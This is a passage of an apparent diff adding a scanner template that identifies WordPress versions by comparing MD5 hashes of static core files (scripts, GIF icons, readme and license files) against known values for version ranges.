4.2 - 4.4.24 + dsl: + - "(\"558fe352dfdab9790dab9710438af5a9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"aec141ea70457e90d42dde854a175957\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ef3b13a4cb7395ecba135bf389e7294f\" == md5(body))" + - 
type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"10accf784a72c030297a52b5a33ce42f\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"48e00fdbf199890d49677720c9a98ea3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f50a36e92153387a5adc0ac424ce5d63\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"fd551bbabf0a178005d74d2d994220b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-tax.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"ec5818c45238461cbce1fee187236490\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0a60b48d0a2580ae43f1ed934f25e51a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bff3a6a1fcc82259876743865f72d438\" == md5(body))" + - type: dsl + name: 4.4.2 - 4.4.24 + dsl: + - "(\"ce627f76baed7a7eb06da71509b066f2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.1 + dsl: + - "(\"dff660355620645c0c23307d49deff92\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"259a386f7971daa9c9b44d20004f1340\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a920718b385e75e18193ee293ffdfd3c\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"169c038f805a493d8b5383670a02d89c\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"a0c85dc2666073624ce26e38d36b32f3\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"0a13ec480d142c7f380a97b6e2459736\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"52a3f5f1b0171e70baa94896642326f0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1e052a12b20c1dfabb85a4c0da26a1cc\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f96182e442bef20e0a110399a1ea5d98\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"430b4ef17a75f9970241e7bb358faaae\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"8419d6590d1eacdd654695b963d1bc01\" == md5(body))" + - type: dsl + name: 2.7 - 
2.7.1 + dsl: + - "(\"867a5f6f312d237c140168c4d4105c6d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"75694df32dda3134f2ae3395701421f3\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"33d9729301a783c6561954a1451119a4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e8705cf154a08cc1027893e287a40ff4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"be41ecebc432f794a5c5fdb1c629ee71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/color-picker.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"05c7f6756aeac3f2cf7d276af6881826\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"8581b5c29da7d13a5f572d065a4ed66a\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"0e948ad7ea32644d4dcadc0f54fac1e3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a00c2e9159048b13c3a5dd4e831099ae\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"085caa20dbc9e9f7343bc0349227bedb\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"585ead88e437e19591a6d8c43de2df50\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"39fa620599ed3bcfcd86d0f08fb3e498\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"adfc5e0653304dd92664a01ce7083649\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"5a2d6a68911f4a366f4ea3ec0a04667e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9a87c880d0052fb9b2460d9036174588\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5d18de7914a3e4c671455d63060dd2a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/comment.js" + matchers: + - type: dsl + name: 4.3 - 4.8.15 + dsl: + - "(\"d9e3db00dcc6ef4d4c03ff455dcb9c55\" == md5(body))" + - type: dsl + name: 3.8 - 4.2.29 + dsl: + - "(\"a3fefb4998b3f534e144db4f235d0f03\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - 
"(\"5a208e90699083d393803d2d3ae55d4c\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"63b766663c76cec017bedd0bfbb726d0\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"7184dc411501524ca065630a3181c342\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"f58da1479570a8daae958114afe35ed9\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9bfe7b668bcea89db5923f364be7d2d5\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"5695c2e76f3252ade7318e8fce327e6c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"48e97502ef33e12eb022ad86d6d0bbb8\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"9d5033c1b96c8f3af0c09f42da8605c3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"863d5773503d6d3b90e42f86f699802d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8d71ea9a92c5a75bf54c3826e9c070a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/heartbeat.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4714400d54b96a2c380b245300a5be5a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"767daa50e889132aca060b188f0c4276\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"25e9e78d00555f2e724456104eff7af0\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"cc2012e2099931cd5db064122a44cb47\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"bdb3765e64c25f8ecae4774edc6768ed\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4215343e6fb0baeb56e1670c323a2579\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1fe14510fc9d98052c08bb3e3e7bdd8e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8548d05cee37b20058732f38c6613fe0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"47c31105470a92578457104c096c0f91\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - 
"(\"38b33c94f0739e506b38ecbb9c62beb7\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4b47f8e4c39036d98dc243d9a29946e2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"396bf1e95fa7f2b2162b2c2b46b7a15a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"db78872d0b60762436b3c1869bd76f68\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0dffa5c13ef8fbc9dbf1cd71a1bc83f5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-box.js" + matchers: + - type: dsl + name: 4.7.3 - 4.8.15 + dsl: + - "(\"caadae9faa6e901537e10b4292184771\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"22409605b64b334cb93f77e246e35ff5\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"98130de261db524ce177b6de91aca164\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"74a49b1066cf04c0e5c92020e0ff23af\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"63756530c3d8b22327dcc0f15e71b8f9\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1c5bb376ced2c7582e77eb388164871b\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"027bb2cd44a823dbd923b98a4f76a9c0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9444ec2274549c1f25b54059720b63af\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d69960fa00e063d0d05e4779828ec42b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/image/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"fcd22e18e8ee0fcf99a822f19dac98d7\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"70e32e47fc0e319bf3558d21c537e983\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"55065b4d900692d4308d97e79a0fa023\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e8631e277ba2b821eb499489ffffd171\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"e0503423284ee602ddafaeb8dd074147\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4ece365f92b620c8d64ef003230fd75c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4c4b675114bc33b728f43f7c6d642f6b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"3a809b03fac37dfc31efdbe4899a90f4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f251faab04cf886a0c6633d8ee73b420\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"603056d1cc5154bb806457d0b4f5d4d3\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"251c380c1f052e4653a01b7888237d7d\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"92889d5f994a6864a8235e5d426c1e73\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"d48ef21012579e885df3ebd794e9499e\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"50bb8db93582d62b01ecb32d3f0f819e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"2d94fa5a43e96cc2ad7dc4e88e900fea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/image/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a6e233c2e8e3903a0b08a9e6ae358d4f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"7f7e4215ef62b1621a3479411d621a9b\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"4584af9ba8c439604e4199168176a7b7\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4a3db8fe2340caae4a61f43104257990\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e60f8eb665759cface17e2662e085ecd\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3fdb72c74a1d00f833cd12985c8964a7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d309316c1767ca923c2216d7348c2194\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d8da74879ff4f0943f245f5dac52f10b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - 
"(\"e808a23a61e91125d5e91a4403739692\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"1344c48d9051035a7b44e80213dfafa0\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"9ce288b4d2a341ae1eb77b53360e3c89\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"5756a9cf36da2f719f90edaeb64f73f7\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"594d170a70097bea65fca5776e691d0b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"c2322e331f19d4449396c292b5d40343\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8a42170c8d0a801b34d85caab530f03d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/xit-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8fb0729c541cbdc4609faf3f4ad02fc7\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c5f831da18e837b9caf290a7866ddca6\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d9a81fb5a5e21e6d74a5e81ce37b421e\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9cd381c6753a40340d85e2c57a3c35c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/xit.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"e5012902a358fbb96031acdcf048d7ca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c313ffcd0a1fe87b0a65dc2553e0ffdb\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"a815dc7ad6c4175e95bc48f3ab6832e9\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"94ecab09335897c4ab392bef96366e7e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/down_arrow.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"65dcc85d3a75ff5776fbe3df0122b7e2\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"21ed67741d76d61ac1190caab379ada8\" == md5(body))" + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"7bbbc00f708a791dc4e674f9e21aa2ca\" == md5(body))" + - 
type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fcf88456be7e16c66ff6596e477e5f75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/down_arrow-2x.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"a073b8a1ee9b2482017f3628da40a861\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"784a750a8b89c341821b90e0fcaba810\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e52496d9eecd561f7c6d964acb0a5a73\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"f75deb11e71999ea4d859ec1fb8766dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_question.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"d22775b2e32645907141f788c36d4e9d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"d9c5f831b1159fb32757ec8735d67fe1\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"b3df5b2d00d22715be1c1d9157b3a246\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_neutral.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"8a95dbfaa99809b0150687ae0cb45aed\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"7445588270b83d0154018a0f6158d779\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"1816d8e65601024d3348553121e19876\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_sad.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"1a273db3c34f6afb3fed75417ca5e7b6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"793fa2ae7c21bd7db0803c27cc1c07a3\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + 
dsl: + - "(\"de4906780fe16fd4d3544d7ae6ed442d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_biggrin.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"c7597052fe2b16db307d6bd14e7b8c6b\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"0f9eafc5f35050bf3d79f38d88bf9d86\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"fc4bb2f14a72a7bd3abf5d0e6b49d87c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_surprised.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"299972b5cdd1f1e0690dd95e4038bd87\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"db0d028bc820c41fff8fadcaee90d43d\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"55ec8bde2deeeb232bfef6b6b530e73f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_wink.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"d01a4f87055ac0fce8a66739d80434ba\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6b687a134711bb0c7dd9b4ba5223d5ca\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"653f1432aee113890f69a1179de0e3a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_cool.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"96467eb5ae18dfa22ea1c0fa3e74380e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"5841374462868c9a766738b5d5bce9fd\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - 
"(\"0a901c7fa06097ecf7e0cd69766a2edf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_confused.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"7fefa473594650055a36b9e3062c9a91\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f4e73191a55161c8654310799bdc09bd\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"2f2309c617d3a27701772478eabe9359\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_smile.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"b2984729c3b6cdc07508b88b5c0a4d1e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"bffd535b79d68b9a2fa2ba56dbd2ea56\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"e3e033f32e291fc0328deadd70ebcef0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_mrgreen.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"fde9e44a8aae0e89bd527792b4779aca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"a0c07b1e446da29dcb0ad9e19ff0bda4\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"8d07245fc613bd75b2587c49251d7e24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_idea.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"bdb3226d2568b8c1edf8f453b1e872e6\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"16c8ed37a3f6d76fdd9c080fe462f6a4\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - 
"(\"e5ecd43c5dd7ff5718330e1974de81e5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_razz.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"17cbe5cbade2b4ec3d85be4ac9409add\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8ae3a1eb1b636b65585da3e12b225008\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"395bde77b310909a44b341044dad41da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_exclaim.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"5ce371458c1a2148595f5f3daf7b5fc8\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"3d11adad32e7bbc4d721156e3b003bd5\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"3a5cadb33e358d00720fc6cef47367d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_mad.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"d7be08b669651a63080cfe7b9004d330\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2ad92f9ec41ddc8ee253c2409a027404\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"561e9e210ecb0c400ffd63fb30e253b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_twisted.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"62abd50ca92eb2381a7c60e351f64c46\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"56d63d335faf2b9b705216f77fc84084\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - 
"(\"4cbed7765b3fe5e92b2a389ed73bc9f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_arrow.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"bfcab5090b1280bbe495dbead4d2281f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"d9078df58bf1de76746241bd92ac2444\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"2009c9ff4a3cd667fecc6f9d08393a78\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/icon_eek.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"a6c65fa6ff738ef6c46a4e80a65f7aa0\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"60666400eabb78b17a76039bdcd4dab0\" == md5(body))" + - type: dsl + name: 2.0 - 3.8.35 + dsl: + - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9c2f4920bfb18a78f129f12822f495e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/blank.gif" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"48bb2baaf4353109f7c2665d96aa390b\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f11f0a834146497c0b9b12fb1027fec7\" == md5(body))" + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"6d22e4f2d2057c6e8d6fab098e76e80f\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"c9fd1cfbca9f678ed068ed6b4bbeb666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/ID3/readme.txt" + matchers: + - type: dsl + name: 4.1 - 5.2.9 + dsl: + - "(\"9396dfe1c69c938eb17f564c4e5bab18\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"fc517870758d5fb84026d45e9aadbd2d\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"dda3f6ff7ad91e65d1a7d1a56b3538e3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/ID3/license.txt" + matchers: + - type: dsl + name: 4.3 
- 5.2.9 + dsl: + - "(\"35d98aadf8f7cc6851336651f7a66b98\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"361298a1f00ff6d56a51e0c3d2233194\" == md5(body))" + - type: dsl + name: 3.6 - 4.0.32 + dsl: + - "(\"9fccf5d6799a9d78e7f6a742b79587e3\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"47d8905625e6505f1117fa0ba8d5b7af\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.min.js" + matchers: + - type: dsl + name: 3.6 - 5.2.9 + dsl: + - "(\"ff2db8dbf145ce47f31781eef33e764a\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"dc7e27d84eafb6b436f9f224e8ce8153\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"7271d32a58986771019f4fa31328cd88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/position.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"1c4a13edec1958817e83433aeaa42f62\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"9396d719a4eadde27896ce30327a3a89\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7d94d07b3a1c9f704b76120cc16874fb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"586bc1619fe2aa146bef070f140fd386\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e7346f4d2945cebe75bd53cf232f927e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/widget.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"8cf7f36bbd79bc0664b6113f7a7837fe\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"0bb0af0869341cca0236ba99d4ea092f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"02e635faa37ecc25ee5d630d888cf53c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b369c6d4df45a622294874f96a746fb5\" == 